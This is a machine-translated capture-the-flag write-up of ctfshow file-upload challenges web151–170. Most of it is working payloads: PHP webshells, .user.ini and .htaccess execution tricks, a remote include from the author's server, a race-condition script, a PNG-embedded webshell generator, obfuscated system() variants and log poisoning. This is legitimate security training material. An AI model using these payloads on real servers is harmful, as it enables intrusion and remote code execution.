CTFshow-WEB entry-file upload (continuous update)

web151

Front-end detection, capture packets and change the suffix.

web152

Pass directly

web153

php2, php3, php4, php5, phps, pht, phtm, phtml
have been tested and none of them work. Therefore, the environment is nginx, not apache, so .htaccess does not work either. Visit the /upload/ directory and find that the page exists. After testing, /upload/index.php exists, so I thought of uploading .user.ini

web154

After testing, there is no php in the file, and the suffix is ​​filtered, and the .user.ini is also used, and the file content is filtered using PHP's short tags: <?=you can:

web155

Same as above.

------WebKitFormBoundaryUpTShwppxfZXSbY7
Content-Disposition: form-data; name="file"; filename="1.feng"
Content-Type: image/png

GIF89a
<?= eval($_POST[0]);?>
------WebKitFormBoundaryUpTShwppxfZXSbY7--

------WebKitFormBoundaryUpTShwppxfZXSbY7
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file="1.feng"
------WebKitFormBoundaryUpTShwppxfZXSbY7--

In addition, there are 4 kinds of php tags mentioned in the WP of Master Yu, and the excerpts are as follows:
1.

<? echo '123';?>

The premise is to turn on the configuration parameter short_open_tags=on
2,

<?=(表达式)?>  等价于 <?php echo (表达式)?>

No need to open parameter settings

3、

<% echo '123';%>

The premise is that the configuration parameter asp_tags=on is turned on. After testing, it is found that the 7.0 and above cannot be used after the modification is completed, but a 500 error is reported, but the version below 7.0 can be used after the configuration is modified.
4.

<script language=”php”>echo '123'; </script>

There is no need to modify the parameter switch, but it can only be used under 7.0.

So if it is a version below php7, the idea can be more developed.

web156

After testing, it is found that [and] is filtered, just use {} to bypass it.

web157

The {} and semicolon are also filtered on the basis of the previous, so read flag.php directly. If there is no semicolon, just take ?> to close it at the end.

------WebKitFormBoundary949cEK9448VGhzDU
Content-Disposition: form-data; name="file"; filename="1.feng"
Content-Type: image/png

GIF89a
<?= system("cat /var/www/html/fl*")?>
------WebKitFormBoundary949cEK9448VGhzDU--

web158

Same as above

web159

Filter the parentheses, just use backticks.

web160

Backticks and spaces are also given to ban. Thinking about file inclusion, try remote file inclusion. Ma write on his own server, and then remotely include:

GIF89a
<?=include"http://118.***.***.***/feng"?>

The command was executed successfully.

Try to include the log file again and find that the log is also banned, so it doesn't work.
But in fact, it’s okay. I’m too good at it. You can do it like this:

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

Learn to work around!

web161

It seems to increase the judgment of the picture, just add the picture header.

web162

The previous session file inclusion is used again. With specific reference to the use of session.upload_progress files contain and de-serialization penetration
script reference feather master, imitating himself wrote a:

import requests
import threading

url="http://4101ed9a-5734-4c58-a661-5697ba7b2325.chall.ctf.show"

data={
    
    
    "PHP_SESSION_UPLOAD_PROGRESS":'<?php system("cat /var/www/html/flag.php");?>'
}
files={
    
    
    "file":"feng.txt"
}
cookies={
    
    
    "PHPSESSID":"feng"
}

def upload():
    global url,data,files,cookies
    while 1:
        requests.post(url=url,data=data,files=files,cookies=cookies)
def getFlag():
    global url
    while 1:
        r=requests.get(url=url+"/upload/index.php").text
        if "flag{" in r or "ctfshow{" in r:
            print(r)

t1=threading.Thread(target=upload,args=())
t2=threading.Thread(target=getFlag,args=())
t1.start()
t2.start()

web163

Same as above, but the probability of conditional competition is particularly low. . . It may also be a problem with my internet speed.

web164

I studied the secondary rendering, and I am also very good at it. The first time I encountered the secondary rendering, I referred to the article recommended by Master Yu: Upload-Labs Pass-16 clearance (secondary rendering bypass) Detailed explanation of
uploading png picture horses , The script is as follows:

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
    
    
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'2.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */

?>

Use a script to change the image locally, upload it, and then download it to execute the command:

see download.php?image=, you suspect that the file may contain something, so you can execute the command, otherwise it won't work. However, according to the source code, the file does contain:

$file= $_GET['image'];

$file = strrev($file);
$ext = strrev(substr($file, 0,4));
if($ext==='.png' && file_exists("./upload/".strrev($file))){
    
    
	header('Content-Type:image/png');
	include("./upload/".strrev($file));
}else{
    
    
	echo "图片错误";
}}

web165

For the secondary rendering of jpg pictures, you can use the script for processing jpg pictures in the article of the previous question, but you need to find a suitable jpg picture. I tried thirty or forty pictures and it didn’t work. I vomited and gave up.

web166

Upload the zip file, but without any detection, directly change the suffix of the php one-sentence Trojan horse to zip, and then upload it.

web167

See httpd, which is related to apache. Mentioning apache will think of .htaccess, so upload .htaccess to parse .jpg:

AddType application/x-httpd-php .jpg

web168

After filtering eval and system, use backticks:

<?php echo `cat /var/www/html/*`;?>

After taking a look at Master Yu’s WP, he gave a lot of bypassing poses and learned:

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>

<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>

web169

It's so difficult to pass. bp can't catch the package. It keeps saying that the type is wrong. After zip, it can finally catch the package, but it also says that the type is wrong.
Then change the Content-Type to image/png to upload php normally, but there is too much filtering in this question, because uploading .user.ini contains log files, and writing horses in the UA header, and then uploading the php file is useless , Just to cooperate with .user.ini.

------WebKitFormBoundaryO73DVbSX5G6XGfNN
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file="/var/log/nginx/access.log"
------WebKitFormBoundaryO73DVbSX5G6XGfNN--

------WebKitFormBoundaryO73DVbSX5G6XGfNN
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file="/var/log/nginx/access.log"
------WebKitFormBoundaryO73DVbSX5G6XGfNN--

Write horse in the UA header, and then execute the command.

web170

Same as above